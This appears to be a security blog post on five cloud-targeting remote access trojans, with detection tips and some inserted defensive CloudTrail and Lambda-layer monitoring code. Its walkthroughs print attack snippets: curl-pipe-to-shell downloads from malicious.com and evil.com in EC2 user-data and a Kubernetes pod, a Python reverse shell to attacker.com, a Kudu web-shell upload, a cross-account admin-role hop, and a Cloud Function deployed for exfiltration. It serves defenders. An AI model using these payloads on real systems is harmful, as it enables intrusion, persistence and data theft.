Cloud infrastructure has become the backbone of modern businesses, but with great scalability comes greater attack surfaces. In 2025, attackers are increasingly targeting cloud environments using sophisticated Remote Access Trojans (RATs). These cloud-focused RATs aren’t just ported versions of traditional malware—they’re designed from the ground up to exploit cloud APIs, container orchestration systems, identity and access management (IAM), and ephemeral infrastructure.
In this blog, I’ll walk you through the five most dangerous cloud RATs I’ve come across this year. But before we get into the list, let’s take a moment to clarify what makes these RATs different from their mobile or traditional counterparts.
What Are Cloud-Focused Remote Access Trojans?
Unlike mobile or desktop RATs that typically rely on local persistence mechanisms, cloud-focused RATs are optimized to:
- Exploit misconfigured IAM roles or API keys.
- Spread laterally across multi-cloud setups.
- Deploy and orchestrate containers or Lambda functions.
- Remain persistent across stateless environments.
Here’s a basic concept of how a cloud RAT might initiate lateral movement in AWS:
```python
import boto3

def assume_role(session_name, role_arn):
    sts_client = boto3.client('sts')
    assumed_role = sts_client.assume_role(
        RoleArn=role_arn,
        RoleSessionName=session_name
    )
    return assumed_role['Credentials']

# Attacker's RAT assumes a role in another account
creds = assume_role("rat-session", "arn:aws:iam::123456789012:role/AdminRole")
```
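The defensive counterpart to that hop, added here as example code (not from the post): it reads CloudTrail AssumeRole records, ignores service-linked assumptions, and flags cross-account hops outside a trust baseline and privileged-role assumptions from addresses outside the CI network. The account ids, IPs, TRUSTED_HOPS, KNOWN_NETWORKS and the sample records are constructed placeholders.

```python
import ipaddress
import json
import re

# Constructed CloudTrail records (placeholder accounts and IPs): a routine CI hop into
# a deploy role, then a hop into an admin role in a third account from outside the CI
# network with a RAT-style session name, then a service-linked assumption by Lambda.
SAMPLE_EVENTS = json.dumps({"Records": [
    {"eventName": "AssumeRole", "sourceIPAddress": "10.20.0.15",
     "userIdentity": {"type": "IAMUser", "accountId": "111111111111"},
     "requestParameters": {"roleArn": "arn:aws:iam::222222222222:role/DeployRole",
                           "roleSessionName": "ci-build-481"}},
    {"eventName": "AssumeRole", "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"type": "IAMUser", "accountId": "111111111111"},
     "requestParameters": {"roleArn": "arn:aws:iam::333333333333:role/AdminRole",
                           "roleSessionName": "rat-session"}},
    {"eventName": "AssumeRole", "sourceIPAddress": "lambda.amazonaws.com",
     "userIdentity": {"type": "AWSService", "invokedBy": "lambda.amazonaws.com"},
     "requestParameters": {"roleArn": "arn:aws:iam::111111111111:role/LambdaExec",
                           "roleSessionName": "fn"}},
]})

# Hypothetical baseline: permitted cross-account hops, the CI network, privileged role names.
TRUSTED_HOPS = {"111111111111": {"222222222222"}}
KNOWN_NETWORKS = [ipaddress.ip_network("10.20.0.0/16")]
PRIVILEGED_ROLE = re.compile(r"admin|owner|root", re.IGNORECASE)

def is_known_ip(addr):
    try:
        return any(ipaddress.ip_address(addr) in net for net in KNOWN_NETWORKS)
    except ValueError:  # service principals log a hostname, not an address
        return True

def suspicious_assume_roles(cloudtrail_json):
    findings = []  # (roleArn, reason)
    for rec in json.loads(cloudtrail_json)["Records"]:
        ident = rec.get("userIdentity", {})
        if rec.get("eventName") != "AssumeRole" or ident.get("type") == "AWSService":
            continue  # service-linked assumptions (Lambda, EC2) are expected noise
        role_arn = rec["requestParameters"]["roleArn"]
        target_account, role_name = role_arn.split(":")[4], role_arn.rsplit("/", 1)[-1]
        caller_account = ident.get("accountId")
        reasons = []
        if target_account != caller_account and target_account not in TRUSTED_HOPS.get(caller_account, set()):
            reasons.append("cross-account hop outside trust baseline")
        if PRIVILEGED_ROLE.search(role_name) and not is_known_ip(rec["sourceIPAddress"]):
            reasons.append("privileged role assumed from unknown IP")
        if reasons:
            findings.append((role_arn, "; ".join(reasons)))
    return findings
```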
Now, let’s dive into the top 5 RATs targeting the cloud in 2025.
1. NimbusStrike
Overview: NimbusStrike is tailor-made for AWS environments. It gains a foothold via leaked or phished API keys and pivots using the AWS CLI and Boto3.
Implementation Strategy:
- Starts with basic key validation using GetCallerIdentity.
- Enumerates services using boto3.
- Deploys backdoored Lambda functions or EC2 user-data scripts.
Code Walkthrough:
```python
# Backdoor an EC2 instance using user-data
import boto3

user_data_script = '''#!/bin/bash
curl -s http://malicious.com/payload.sh | bash
'''

ec2 = boto3.client('ec2')
ec2.run_instances(
    ImageId='ami-xyz',
    MinCount=1,
    MaxCount=1,
    UserData=user_data_script,
    InstanceType='t2.micro'
)
```
Detection Tip: Look for unusual RunInstances events or modified user-data. AWS CloudTrail can help identify anomalies.
2. AzurePhantom
Overview: This RAT targets Microsoft Azure via the REST API. It abuses service principals and injects web shells into App Services.
Implementation Strategy:
- Gains access using compromised client secrets.
- Uses az rest and PowerShell to control cloud resources.
- Deploys Kudu-based web shells.
Code Walkthrough (Web Shell Deployment):
```bash
curl -X PUT -u ":$DEPLOYMENT_PASSWORD" \
  -T shell.aspx \
  https://.scm.azurewebsites.net/wwwroot/shell.aspx
```
Detection Tip: Monitor Kudu SCM API access and look for non-developer IPs pushing content to /wwwroot.
3. CloudSpectre
Overview: CloudSpectre is a container-native RAT that integrates with Kubernetes clusters. It spreads via kubelets and misconfigured dashboards.
Implementation Strategy:
- Deploys as a sidecar container.
- Uses the Kubernetes API to enumerate nodes and secrets.
- Bypasses RBAC using stolen tokens.
Code Walkthrough (Pod Deployment):
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: backdoor
spec:
  containers:
  - name: rat
    image: attacker/reverse-shell:latest
    command: ["/bin/sh", "-c", "curl http://evil.com/shell.sh | sh"]
```
Detection Tip: Audit your kube-apiserver logs and RBAC policy usage. Look for unapproved container images.
4. LambdaGhost
Overview: LambdaGhost specializes in ephemeral persistence by injecting itself into AWS Lambda layers. It rarely touches disk and evades most scanning tools.
Implementation Strategy:
- Attaches malicious Lambda layers to existing functions.
- Uses obfuscated Python/Node.js payloads.
- Communicates over hidden CloudWatch logs.
Code Walkthrough (Python Layer Hijack):
```python
# Sample RAT logic inside a Lambda layer
import socket

def backdoor():
    s = socket.socket()
    s.connect(('attacker.com', 4444))
    while True:
        cmd = s.recv(1024).decode()
        exec(cmd)
```
Detection Tip: Track changes to Lambda layers. Monitor outbound connections from Lambda functions with VPC access.
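One way to "track changes to Lambda layers", added here as example code (not from the post): layer_drift compares function configurations in the shape of boto3's list_functions() output against a baseline of expected layer names and flags layers owned by another account, and layer_changes_outside_ci picks CloudTrail layer-related events made by anything other than the CI deploy role. The baseline, account ids, role name and samples are constructed placeholders.

```python
# Hypothetical baseline: the layer names (version stripped) each function is
# expected to carry; any other layer, or one owned by another account, is drift.
BASELINE = {"orders": {"common"}, "billing": {"common", "pdf"}}
# CloudTrail Lambda event names carry an API-version suffix (for example
# UpdateFunctionConfiguration20150331v2), so match on the prefix.
LAYER_EVENTS = ("UpdateFunctionConfiguration", "PublishLayerVersion", "AddLayerVersionPermission")
CI_ROLE_PREFIX = "arn:aws:sts::111111111111:assumed-role/DeployRole/"  # hypothetical deploy identity

def layer_parts(layer_arn):
    """(owner account, layer name, version) from arn:aws:lambda:<region>:<acct>:layer:<name>:<ver>."""
    f = layer_arn.split(":")
    return f[4], f[6], int(f[7])

def layer_drift(functions, baseline=BASELINE):
    """Compare live function configurations (shape of list_functions()['Functions']) to the baseline."""
    findings = []
    for fn in functions:
        name, fn_account = fn["FunctionName"], fn["FunctionArn"].split(":")[4]
        for layer in fn.get("Layers", []):
            owner, lname, _ = layer_parts(layer["Arn"])
            if owner != fn_account:
                findings.append((name, layer["Arn"], "layer owned by a different account"))
            if lname not in baseline.get(name, set()):
                findings.append((name, layer["Arn"], "layer not in baseline"))
    return findings

def layer_changes_outside_ci(records):
    """CloudTrail records that add or publish layers from any identity other than the CI role."""
    return [(r["eventName"], r["userIdentity"].get("arn", "")) for r in records
            if r["eventName"].startswith(LAYER_EVENTS)
            and not r["userIdentity"].get("arn", "").startswith(CI_ROLE_PREFIX)]

# Constructed samples (placeholder account ids and ARNs).
SAMPLE_FUNCTIONS = [
    {"FunctionName": "orders", "FunctionArn": "arn:aws:lambda:us-east-1:111111111111:function:orders",
     "Layers": [{"Arn": "arn:aws:lambda:us-east-1:111111111111:layer:common:3"}]},
    {"FunctionName": "billing", "FunctionArn": "arn:aws:lambda:us-east-1:111111111111:function:billing",
     "Layers": [{"Arn": "arn:aws:lambda:us-east-1:111111111111:layer:common:3"},
                {"Arn": "arn:aws:lambda:us-east-1:999999999999:layer:telemetry:1"}]},
]
SAMPLE_TRAIL = [
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:sts::111111111111:assumed-role/DeployRole/ci-build-481"}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ops-tmp"}},
]
```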
5. GCPReaper
Overview: This RAT hits Google Cloud environments, especially Compute Engine and Cloud Functions. It abuses service accounts and IAM impersonation.
Implementation Strategy:
- Impersonates service accounts using OAuth tokens.
- Deploys Cloud Functions with malicious payloads.
- Exfiltrates data via the Google Sheets API.
Code Walkthrough (Function Deployment):
```bash
gcloud functions deploy exfil --runtime python39 \
  --trigger-http --entry-point main \
  --source=gs://evil-bucket/source.zip
```
Detection Tip: Enable logging for gcloud functions deploy and use Event Threat Detection to alert on abuse.
Conclusion
Cloud-focused RATs are a different beast altogether. They exploit the abstraction and automation of cloud services to hide, persist, and move laterally. Tools like NimbusStrike and AzurePhantom don't need traditional persistence mechanisms; they thrive on IAM misconfigurations and poorly monitored serverless functions.
If you’re in charge of cloud security, it’s not enough to secure your EC2 or S3. You need to:
- Continuously rotate and audit your API keys.
- Enforce least-privilege policies on IAM.
- Monitor all deployments via CI/CD pipelines.
- Enable real-time alerting for cloud-native operations.
These threats are real, and they’re only growing more stealthy with each iteration. Hopefully, this guide gave you some practical insight into the landscape of cloud-based RATs in 2025.